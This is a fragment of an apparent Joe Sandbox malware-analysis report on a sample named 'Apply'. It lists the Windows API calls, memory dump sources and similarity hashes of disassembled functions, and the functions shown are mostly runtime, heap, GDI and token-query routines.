                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,008CC98D,00000000), ref: 008CD761
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                    • String ID:
                                                    • API String ID: 3191363074-0
                                                    • Opcode ID: 3e753dab0a4ef450b1772a450a879f7b5b0d86e6f607e0fa97a554e717092110
                                                    • Instruction ID: f159324e287e2eb14b0b39e65b300f0ba285a719c4305e95902c425e4f4cd1f7
                                                    • Opcode Fuzzy Hash: 3e753dab0a4ef450b1772a450a879f7b5b0d86e6f607e0fa97a554e717092110
                                                    • Instruction Fuzzy Hash: E9313871500309EFDB24EFA5D884EAABBF8FB14354B10842EE50AD7550E730EE45DBA0
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0088D117
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0088D13A
                                                      • Part of subcall function 00883B70: RtlAllocateHeap.NTDLL(00000000,?,?,?,00876A59,?,0000015D,?,?,?,?,00878590,000000FF,00000000,?,?), ref: 00883BA2
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0088D160
                                                    • _free.LIBCMT ref: 0088D173
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0088D182
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                    • String ID:
                                                    • API String ID: 336800556-0
                                                    • Opcode ID: 6b1e48d2ba88e2a5de5e1936bb749f936b0cf357c34268953d95c76c24655601
                                                    • Instruction ID: eb8e6078d147fb962f84a7965ceee226559b35f9d34c6f4d00815fd10f104204
                                                    • Opcode Fuzzy Hash: 6b1e48d2ba88e2a5de5e1936bb749f936b0cf357c34268953d95c76c24655601
                                                    • Instruction Fuzzy Hash: 2D0171B66017597F2321767A5C8CC7BBA6DFEC6BA0314012AB904CA2A4EA618C0182B1
                                                    APIs
                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008698C9
                                                    • SelectObject.GDI32(?,00000000), ref: 008698D8
                                                    • BeginPath.GDI32(?), ref: 008698EF
                                                    • SelectObject.GDI32(?,00000000), ref: 00869918
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ObjectSelect$BeginCreatePath
                                                    • String ID:
                                                    • API String ID: 3225163088-0
                                                    • Opcode ID: f11a42a5f8225fe6d6ae13a493e49baabf46d418d040616b9d3db34c57b40f7e
                                                    • Instruction ID: 5858c1bbc79a382893ac2d45cfdc043e4fb66547a16fe1abe69b283d95e0fc55
                                                    • Opcode Fuzzy Hash: f11a42a5f8225fe6d6ae13a493e49baabf46d418d040616b9d3db34c57b40f7e
                                                    • Instruction Fuzzy Hash: 2021B034819709FBDB219F14DE45769BB69FB02321F15022AF454D71F0D3704986EB91
                                                    APIs
                                                    • GetLastError.KERNEL32(0000000A,?,?,00882B6D,0087543F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0088314D
                                                    • _free.LIBCMT ref: 00883182
                                                    • _free.LIBCMT ref: 008831A9
                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 008831B6
                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 008831BF
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free
                                                    • String ID:
                                                    • API String ID: 3170660625-0
                                                    • Opcode ID: f2a5475303f8d23c2a8aa1b590e0ec6c8605c067e7b19fa7d9651fee5260cdc7
                                                    • Instruction ID: 1bfc81869a0f78e85573211da35a47b6b68616cb1f773f8f745672714166d664
                                                    • Opcode Fuzzy Hash: f2a5475303f8d23c2a8aa1b590e0ec6c8605c067e7b19fa7d9651fee5260cdc7
                                                    • Instruction Fuzzy Hash: 8C01F47A20971077D22277396C8DD6B356DFBD0F747200128FC15D6281EF618E065362
                                                    APIs
                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B05C8,80070057,?,?,?,008B09E5), ref: 008B06B2
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B05C8,80070057,?,?), ref: 008B06CD
                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B05C8,80070057,?,?), ref: 008B06DB
                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B05C8,80070057,?), ref: 008B06EB
                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B05C8,80070057,?,?), ref: 008B06F7
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                    • String ID:
                                                    • API String ID: 3897988419-0
                                                    • Opcode ID: 02f4892651e0be92215a04fb7dd7b204dfcfb5d814b2826844fdbcef271de05f
                                                    • Instruction ID: 79fcd6c97da54c54b4686848081627fc59511f796a99796a5214dc60136cb301
                                                    • Opcode Fuzzy Hash: 02f4892651e0be92215a04fb7dd7b204dfcfb5d814b2826844fdbcef271de05f
                                                    • Instruction Fuzzy Hash: AD017872600325AFDB105F64CC88ADA7BADFF88791F140424F905DA310EB71DD509BA0
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 008BEFD8
                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 008BEFE6
                                                    • Sleep.KERNEL32(00000000), ref: 008BEFEE
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 008BEFF8
                                                    • Sleep.KERNEL32 ref: 008BF034
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: 620faa4df0ded931325cc33d6368f6527e529cfc5cc84c4e7b8ba6b8d8880882
                                                    • Instruction ID: cefae9cb3900999db983178f2c07f9def13f1d61dd9a180c357a27f8d0259d05
                                                    • Opcode Fuzzy Hash: 620faa4df0ded931325cc33d6368f6527e529cfc5cc84c4e7b8ba6b8d8880882
                                                    • Instruction Fuzzy Hash: 33012971C05A1DDBCF00AFA5DC889EDFBB8FB0D715F010055EA02F6251CB3095599761
                                                    APIs
                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008B17F6
                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,008B127D,?,?,?), ref: 008B1802
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,008B127D,?,?,?), ref: 008B1811
                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,008B127D,?,?,?), ref: 008B1818
                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008B182F
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 842720411-0
                                                    • Opcode ID: d8b863ea6ead47d00e8356a301edc2ff059bf3e72b9b2f398165d64b7282b88d
                                                    • Instruction ID: af19b22ca76aafc69ffe1dc98122da07e7c0a3d52aa89044e7e72bd08ed44f3b
                                                    • Opcode Fuzzy Hash: d8b863ea6ead47d00e8356a301edc2ff059bf3e72b9b2f398165d64b7282b88d
                                                    • Instruction Fuzzy Hash: 410169B5200305BFDB114FA4EC88AAA3B7EFF893A0B250428F845CB360DA31DC40CA60
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008B16AC
                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008B16B8
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008B16C7
                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008B16CE
                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008B16E4
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: b860c07ef3d5951ec737865730d34ae38a98c6ca51b33b7b76c02184d5c67c2b
                                                    • Instruction ID: 34e902373fe6de125eb8f74405d83cf3e0c6ae152d4bdbb83a4d5f9bc78c2fe0
                                                    • Opcode Fuzzy Hash: b860c07ef3d5951ec737865730d34ae38a98c6ca51b33b7b76c02184d5c67c2b
                                                    • Instruction Fuzzy Hash: F1F0497A200341AFDB115FA59C8DF973BADFF8A760F540414FA55CF2A1DA70DC048A60
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008B170C
                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008B1718
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008B1727
                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 008B172E
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008B1744
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: 7239982eedb3abf60d0af1669e097264ae9122ac019936b53d1cc148b09468f0
                                                    • Instruction ID: c17147962a15291f9d6321781884c84818aabb177c9412b88ac47c4a3d7df5fb
                                                    • Opcode Fuzzy Hash: 7239982eedb3abf60d0af1669e097264ae9122ac019936b53d1cc148b09468f0
                                                    • Instruction Fuzzy Hash: 31F0377A200302ABDB125BA4EC9DA963BADFF89660F100414FA55CB2A0DA70D9048A60
                                                    APIs
                                                    • CloseHandle.KERNEL32(?,?,?,?,008C084E,?,008C3A6B,?,00000001,00893E59,?), ref: 008C09F5
                                                    • CloseHandle.KERNEL32(?,?,?,?,008C084E,?,008C3A6B,?,00000001,00893E59,?), ref: 008C0A02
                                                    • CloseHandle.KERNEL32(?,?,?,?,008C084E,?,008C3A6B,?,00000001,00893E59,?), ref: 008C0A0F
                                                    • CloseHandle.KERNEL32(?,?,?,?,008C084E,?,008C3A6B,?,00000001,00893E59,?), ref: 008C0A1C
                                                    • CloseHandle.KERNEL32(?,?,?,?,008C084E,?,008C3A6B,?,00000001,00893E59,?), ref: 008C0A29
                                                    • CloseHandle.KERNEL32(?,?,?,?,008C084E,?,008C3A6B,?,00000001,00893E59,?), ref: 008C0A36
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: f0bec25ffa8ee675cdc80271f2a99e2fd07d80f8e77790299c51e8e8db407e80
                                                    • Instruction ID: 90f22c268623db10d0f58c3a5e2ff5a833942a7a5b13ab1ba11e471bf07b1bca
                                                    • Opcode Fuzzy Hash: f0bec25ffa8ee675cdc80271f2a99e2fd07d80f8e77790299c51e8e8db407e80
                                                    • Instruction Fuzzy Hash: 2A019071800B55DFCB309F66D880816FAF5FF602553158A3ED19792921C7B0A988CE80
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 008B6351
                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 008B6368
                                                    • MessageBeep.USER32(00000000), ref: 008B6380
                                                    • KillTimer.USER32(?,0000040A), ref: 008B639C
                                                    • EndDialog.USER32(?,00000001), ref: 008B63B6
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: 680b55c8b755efeb86c129a9df0d12201bf1d0d9882801bcdd14ecfbe399a8d4
                                                    • Instruction ID: fe923189e424a725c569c16072f15e8d2a4f04aff09a89a5e00ff997a8cd0304
                                                    • Opcode Fuzzy Hash: 680b55c8b755efeb86c129a9df0d12201bf1d0d9882801bcdd14ecfbe399a8d4
                                                    • Instruction Fuzzy Hash: C501A430500704ABEB315B50DD8EBD67BB8FF14706F040659F586E52E1EBF4A958CB90
                                                    APIs
                                                    • _free.LIBCMT ref: 0088DAA3
                                                      • Part of subcall function 00882D18: RtlFreeHeap.NTDLL(00000000,00000000,?,0088DB22,00921DB4,00000000,00921DB4,00000000,?,0088DB49,00921DB4,00000007,00921DB4,?,0088DF46,00921DB4), ref: 00882D2E
                                                      • Part of subcall function 00882D18: GetLastError.KERNEL32(00921DB4,?,0088DB22,00921DB4,00000000,00921DB4,00000000,?,0088DB49,00921DB4,00000007,00921DB4,?,0088DF46,00921DB4,00921DB4), ref: 00882D40
                                                    • _free.LIBCMT ref: 0088DAB5
                                                    • _free.LIBCMT ref: 0088DAC7
                                                    • _free.LIBCMT ref: 0088DAD9
                                                    • _free.LIBCMT ref: 0088DAEB
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 121245ea7c044955f138100b032527f23fcc72a8e7c677bc96b17f70f15039ad
                                                    • Instruction ID: bbd22ff653b6b943cc86404030c7c04378937e5fbee1ccf3b20aee4396099556
                                                    • Opcode Fuzzy Hash: 121245ea7c044955f138100b032527f23fcc72a8e7c677bc96b17f70f15039ad
                                                    • Instruction Fuzzy Hash: A4F0123265A329AB9624FB5CE585C5AB7DDFF007607B48845F409D7981CB30FC809BA1
                                                    APIs
                                                    • _free.LIBCMT ref: 0088257E
                                                      • Part of subcall function 00882D18: RtlFreeHeap.NTDLL(00000000,00000000,?,0088DB22,00921DB4,00000000,00921DB4,00000000,?,0088DB49,00921DB4,00000007,00921DB4,?,0088DF46,00921DB4), ref: 00882D2E
                                                      • Part of subcall function 00882D18: GetLastError.KERNEL32(00921DB4,?,0088DB22,00921DB4,00000000,00921DB4,00000000,?,0088DB49,00921DB4,00000007,00921DB4,?,0088DF46,00921DB4,00921DB4), ref: 00882D40
                                                    • _free.LIBCMT ref: 00882590
                                                    • _free.LIBCMT ref: 008825A3
                                                    • _free.LIBCMT ref: 008825B4
                                                    • _free.LIBCMT ref: 008825C5
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 06e68b7ae60b9387bca7f75cc87143728941c641db5e43c7b75a4421bf36e338
                                                    • Instruction ID: ef0f51c038e0683372799474689869678742908249d657cecdbcb755f089160f
                                                    • Opcode Fuzzy Hash: 06e68b7ae60b9387bca7f75cc87143728941c641db5e43c7b75a4421bf36e338
                                                    • Instruction Fuzzy Hash: E2F05E7096A6259BD625FF18BC014997FA0FB247507108146F820D6671CB320953FFD1
                                                    APIs
                                                    • EndPath.GDI32(?), ref: 0086980A
                                                    • StrokeAndFillPath.GDI32(?,?,008A7807,00000000,?,?,?), ref: 00869826
                                                    • SelectObject.GDI32(?,00000000), ref: 00869839
                                                    • DeleteObject.GDI32 ref: 0086984C
                                                    • StrokePath.GDI32(?), ref: 00869867
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                    • String ID:
                                                    • API String ID: 2625713937-0
                                                    • Opcode ID: 17cc03dac9d2d4cac1c36f56ca9b7edd3fad15ec1807cce928a0593612953cba
                                                    • Instruction ID: 6dc41e4faed6f63b5f4ad9e4fb1e9cfcfee69d3c31ceec81dc6331071f680330
                                                    • Opcode Fuzzy Hash: 17cc03dac9d2d4cac1c36f56ca9b7edd3fad15ec1807cce928a0593612953cba
                                                    • Instruction Fuzzy Hash: 60F01934019B49FBDB255F25EE48B687B69FB42322F088224E4658A0F0C7318896EF91
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: __freea$_free
                                                    • String ID: a/p$am/pm
                                                    • API String ID: 3432400110-3206640213
                                                    • Opcode ID: c51adbf382410d328726619aeeb7f544c36da2c4e638a5bca7f7dc6d23d95c2b
                                                    • Instruction ID: c9cf844bb3951c52ff76fc17d4d2f637926903d29afeb4c188335eec7e0c7e39
                                                    • Opcode Fuzzy Hash: c51adbf382410d328726619aeeb7f544c36da2c4e638a5bca7f7dc6d23d95c2b
                                                    • Instruction Fuzzy Hash: 90D1027190020ADACF24FF68C84DAFAB7B9FF25700F284119E546EB650EB758D82CB51
                                                    APIs
                                                      • Part of subcall function 00870592: EnterCriticalSection.KERNEL32(009216FC,?,?,?,0085C0BA,00923560,00922408,00000001,00000000,CMDLINERAW,?,00922408,?,?,?,00000000), ref: 0087059D
                                                      • Part of subcall function 00870592: LeaveCriticalSection.KERNEL32(009216FC,?,?,?,0085C0BA,00923560,00922408,00000001,00000000,CMDLINERAW,?,00922408,?,?,?,00000000), ref: 008705DA
                                                      • Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE
                                                      • Part of subcall function 008703F3: __onexit.LIBCMT ref: 008703F9
                                                    • __Init_thread_footer.LIBCMT ref: 008D8382
                                                      • Part of subcall function 00870548: EnterCriticalSection.KERNEL32(009216FC,?,?,0085C0E8,00923560,00892799,00922408,00000001,00000000,CMDLINERAW,?,00922408,?,?,?,00000000), ref: 00870552
                                                      • Part of subcall function 00870548: LeaveCriticalSection.KERNEL32(009216FC,?,0085C0E8,00923560,00892799,00922408,00000001,00000000,CMDLINERAW,?,00922408,?,?,?,00000000), ref: 00870585
                                                    Strings
                                                    Memory Dump Source
